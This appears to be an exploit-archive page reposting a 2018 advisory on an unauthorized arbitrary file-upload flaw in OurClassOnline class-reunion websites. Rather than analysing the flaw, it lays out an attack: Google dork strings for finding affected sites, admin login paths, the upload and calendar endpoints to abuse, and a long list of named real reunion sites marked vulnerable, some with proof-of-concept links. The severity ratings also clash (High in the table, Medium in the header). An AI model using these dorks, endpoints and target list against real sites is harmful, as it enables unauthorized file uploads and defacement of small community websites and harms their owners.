Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CWE-264 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-11-13 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
################################################################################################# # Exploit Title : Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 13/11/2018 # Vendor Homepage : webportalpeople.com ~ ourclassonline.com # Tested On : Windows and Linux # Category : WebApps # Google Dorks : intext:''To obtain a site like this for your class visit www.ourclassonline.com.'' intext:''Copyright Web Portal People, LLC. 2018 - Maker of class reunion & family websites. All rights reserved.'' # Exploit Risk : Medium # CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] ################################################################################################# # Admin and Moderator Panel Login Paths : /admin/index.php /login_form.php?action=reunion /login_form.php?action=news /login_form.php?action=classmates /login_form.php?action=gallery&galleryid=6 /login_form.php?action=gallery&galleryid=2 /login_form.php?action=gallery&galleryid=3 /login_form.php?action=year_review /login_form.php?action=gallery&galleryid=4 ################################################################################################# # Exploit : /forum_topic_create.php?forumid=1 /files_forum/[RANDOM-NUMBER]_[YOUR-FLENAME-HERE].txt /calendar_add.php /calendar_event.php?eventid=[RANDOM-NUMBER] ################################################################################################# # Example Vulnerable Sites => [+] mcclintockhighchargers1968.com/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/YZhat [+] tech1958.net/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/euIxf [+] tempehighbuffs68.com/forum_topic_create.php?forumid=1 [+] orhs66.com/forum_topic_create.php?forumid=1 [+] denfeld59.com/forum_topic_create.php?forumid=1 [+] edison68.com/forum_topic_create.php?forumid=1 [+] edison64.com/forum_topic_create.php?forumid=1 [+] edison65.com/forum_topic_create.php?forumid=1 [+] marshalltown68.com/forum_topic_create.php?forumid=1 [+] ths1958.com/forum_topic_create.php?forumid=1 [+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1 [+] hths74.com/forum_topic_create.php?forumid=1 [+] salemhighschool1959.com/forum_topic_create.php?forumid=1 [+] lchs1966bulldogs.com/forum_topic_create.php?forumid=1 [+] hooverhighclassof63.com/forum_topic_create.php?forumid=1 [+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1 [+] phs1957.com/forum_topic_create.php?forumid=1 [+] redlandshigh65.com/forum_topic_create.php?forumid=1 [+] warrenmott1983.com/forum_topic_create.php?forumid=1 [+] dulutheast1965.com/forum_topic_create.php?forumid=1 [+] axemen68.org/forum_topic_create.php?forumid=1 [+] olympushigh1967.com/forum_topic_create.php?forumid=1 [+] leuzingerhigh1981.com/forum_topic_create.php?forumid=1 [+] bozemanhawks88.com/forum_topic_create.php?forumid=1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.